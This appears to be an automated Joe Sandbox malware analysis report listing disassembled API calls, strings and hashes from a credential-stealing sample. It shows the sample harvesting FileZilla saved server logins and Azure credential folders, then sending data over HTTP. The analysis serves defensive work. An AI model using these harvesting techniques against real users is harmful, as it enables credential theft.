                                                        • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                        • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                        • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                        • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574915404.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E89000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2e89000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction ID: 780ac11bc04e9a938b181fae32549185f65dfa24d478f4f0179512c47d94bbd7
                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction Fuzzy Hash: 79118272780100AFDB44DF55DCC1FA673EAEB89364B198055ED0CCB316D676E801C760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction ID: d563942bae2b3abdd7d807a83720178f8332bc454926aa2c2bef7496043ee237
                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction Fuzzy Hash: 0901F273A116008FDFA1CF20C804BAA33E9FBC6606F0540A4DA0A9728AE370A941CB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: free
                                                        • String ID:
                                                        • API String ID: 1294909896-0
                                                        • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                        • Instruction ID: 4962437f23da8068dd777ee34c4c6db12b90f77ae8cf357cdab2f1a3510c9d46
                                                        • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                        • Instruction Fuzzy Hash: D871C231451B42EBD7633B31DD41F4A7AA3FF04702F104924A3DB297B0AE226C65AE71
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • strtok_s.MSVCRT ref: 0041031B
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                          • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                          • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                        • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                        • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                        • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                        • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                        • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                        • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                        • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                        • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                        • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                        • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                        • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                        • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                        • strtok_s.MSVCRT ref: 00410679
                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                        • memset.MSVCRT ref: 004106DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                        • API String ID: 337689325-514892060
                                                        • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                        • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                        • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                        • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                        APIs
                                                        • lstrlen.KERNEL32(00424DA0), ref: 02CF4833
                                                        • lstrlen.KERNEL32(00424E50), ref: 02CF483E
                                                        • lstrlen.KERNEL32(00424F18), ref: 02CF4849
                                                        • lstrlen.KERNEL32(00424FD0), ref: 02CF4854
                                                        • lstrlen.KERNEL32(00425078), ref: 02CF485F
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 02CF486E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02CF4875
                                                        • lstrlen.KERNEL32(00425120), ref: 02CF4883
                                                        • lstrlen.KERNEL32(004251C8), ref: 02CF488E
                                                        • lstrlen.KERNEL32(00425270), ref: 02CF4899
                                                        • lstrlen.KERNEL32(00425318), ref: 02CF48A4
                                                        • lstrlen.KERNEL32(004253C0), ref: 02CF48AF
                                                        • lstrlen.KERNEL32(00425468), ref: 02CF48C3
                                                        • lstrlen.KERNEL32(00425510), ref: 02CF48CE
                                                        • lstrlen.KERNEL32(004255B8), ref: 02CF48D9
                                                        • lstrlen.KERNEL32(00425660), ref: 02CF48E4
                                                        • lstrlen.KERNEL32(00425708), ref: 02CF48EF
                                                        • lstrlen.KERNEL32(004257B0), ref: 02CF4918
                                                        • lstrlen.KERNEL32(00425858), ref: 02CF4923
                                                        • lstrlen.KERNEL32(00425920), ref: 02CF492E
                                                        • lstrlen.KERNEL32(004259C8), ref: 02CF4939
                                                        • lstrlen.KERNEL32(00425A70), ref: 02CF4944
                                                        • strlen.MSVCRT ref: 02CF4957
                                                        • lstrlen.KERNEL32(00425B18), ref: 02CF497F
                                                        • lstrlen.KERNEL32(00425BC0), ref: 02CF498A
                                                        • lstrlen.KERNEL32(00425C68), ref: 02CF4995
                                                        • lstrlen.KERNEL32(00425D10), ref: 02CF49A0
                                                        • lstrlen.KERNEL32(00425DB8), ref: 02CF49AB
                                                        • lstrlen.KERNEL32(00425E60), ref: 02CF49BB
                                                        • lstrlen.KERNEL32(00425F08), ref: 02CF49C6
                                                        • lstrlen.KERNEL32(00425FB0), ref: 02CF49D1
                                                        • lstrlen.KERNEL32(00426058), ref: 02CF49DC
                                                        • lstrlen.KERNEL32(00426100), ref: 02CF49E7
                                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02CF4A03
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                        • String ID:
                                                        • API String ID: 2127927946-0
                                                        • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction ID: 535379f6fafc4125729f1a3d8f81d10aefda65b6afa9e4ee8e066b05c49e9037
                                                        • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                        • Instruction Fuzzy Hash: 9C41C979740624EBC718AFE5EC89B987F71AB4C712BA0C062FA0295190CBB5D5019B3D
                                                        APIs
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02D09B08
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02D09B21
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02D09B39
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02D09B51
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02D09B6A
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02D09B82
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02D09B9A
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02D09BB3
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02D09BCB
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02D09BE3
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02D09BFC
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02D09C14
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02D09C2C
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02D09C45
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 02D09C5D
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 02D09C75
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 02D09C8E
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 02D09CA6
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 02D09CBE
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 02D09CD7
                                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 02D09CEF
                                                        • LoadLibraryA.KERNEL32(0064A550,?,02D06C67), ref: 02D09D01
                                                        • LoadLibraryA.KERNEL32(0064A17C,?,02D06C67), ref: 02D09D12
                                                        • LoadLibraryA.KERNEL32(0064A104,?,02D06C67), ref: 02D09D24
                                                        • LoadLibraryA.KERNEL32(0064A1DC,?,02D06C67), ref: 02D09D36
                                                        • LoadLibraryA.KERNEL32(0064A328,?,02D06C67), ref: 02D09D47
                                                        • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 02D09D69
                                                        • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 02D09D8A
                                                        • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 02D09DA2
                                                        • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 02D09DC4
                                                        • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 02D09DE5
                                                        • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 02D09E06
                                                        • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 02D09E1D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 2238633743-0
                                                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction ID: 0a193a3d30cdaef0d2ec6355de86efcb76142e0af40215a03a331201d2768cdb
                                                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction Fuzzy Hash: D0A14DBD5C0240BFE354EFE8ED98A963BFBF74E601704661AE605C3264D7399841DB12
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D09047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D09072
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CF9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02CF9C53
                                                          • Part of subcall function 02CF9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02CF9C78
                                                          • Part of subcall function 02CF9C27: LocalAlloc.KERNEL32(00000040,?), ref: 02CF9C98
                                                          • Part of subcall function 02CF9C27: ReadFile.KERNEL32(000000FF,?,00000000,02CF16F6,00000000), ref: 02CF9CC1
                                                          • Part of subcall function 02CF9C27: LocalFree.KERNEL32(02CF16F6), ref: 02CF9CF7
                                                          • Part of subcall function 02CF9C27: CloseHandle.KERNEL32(000000FF), ref: 02CF9D01
                                                          • Part of subcall function 02D09097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D090B9
                                                        • strtok_s.MSVCRT ref: 02D00582
                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 02D005C9
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02D005D0
                                                        • StrStrA.SHLWAPI(00000000,00421618), ref: 02D005EC
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D005FA
                                                          • Part of subcall function 02D08B47: malloc.MSVCRT ref: 02D08B4F
                                                          • Part of subcall function 02D08B47: strncpy.MSVCRT ref: 02D08B6A
                                                        • StrStrA.SHLWAPI(00000000,00421620), ref: 02D00636
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D00644
                                                        • StrStrA.SHLWAPI(00000000,00421628), ref: 02D00680
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D0068E
                                                        • StrStrA.SHLWAPI(00000000,00421630), ref: 02D006CA
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D006DC
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D00769
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D00781
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D00799
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D007B1
                                                        • lstrcat.KERNEL32(?,0042164C), ref: 02D007C9
                                                        • lstrcat.KERNEL32(?,00421660), ref: 02D007D8
                                                        • lstrcat.KERNEL32(?,00421670), ref: 02D007E7
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D007FA
                                                        • lstrcat.KERNEL32(?,00421678), ref: 02D00809
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D0081C
                                                        • lstrcat.KERNEL32(?,0042167C), ref: 02D0082B
                                                        • lstrcat.KERNEL32(?,00421680), ref: 02D0083A
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D0084D
                                                        • lstrcat.KERNEL32(?,00421688), ref: 02D0085C
                                                        • lstrcat.KERNEL32(?,0042168C), ref: 02D0086B
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D0087E
                                                        • lstrcat.KERNEL32(?,00421698), ref: 02D0088D
                                                        • lstrcat.KERNEL32(?,0042169C), ref: 02D0089C
                                                        • strtok_s.MSVCRT ref: 02D008E0
                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D008F5
                                                        • memset.MSVCRT ref: 02D00944
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                        • String ID:
                                                        • API String ID: 3689735781-0
                                                        • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                        • Instruction ID: cad31dffa990ad3f06106af92f45c270b17584c95da9cbfd46b11d73770a8e48
                                                        • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                        • Instruction Fuzzy Hash: 13D12B76A40208ABCB04EBE4DD95FEE777AEF14301F504519E202A62E0EF74AE05CF65
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                        • StrCmpCA.SHLWAPI(?,02EBB178), ref: 00405A13
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02EBB048,00000000,?,02E84BE8,00000000,?,00421A1C), ref: 00405E71
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                        • memcpy.MSVCRT(?), ref: 00405EFE
                                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                        • HttpOpenRequestA.WININET(00000000,02EBB0F8,?,02EBB9B8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                        • String ID: "$"$------$------$------
                                                        • API String ID: 1406981993-2180234286
                                                        • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                        • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                        • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                        • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                        APIs
                                                        • memset.MSVCRT ref: 00414D87
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        • memset.MSVCRT ref: 00414E13
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
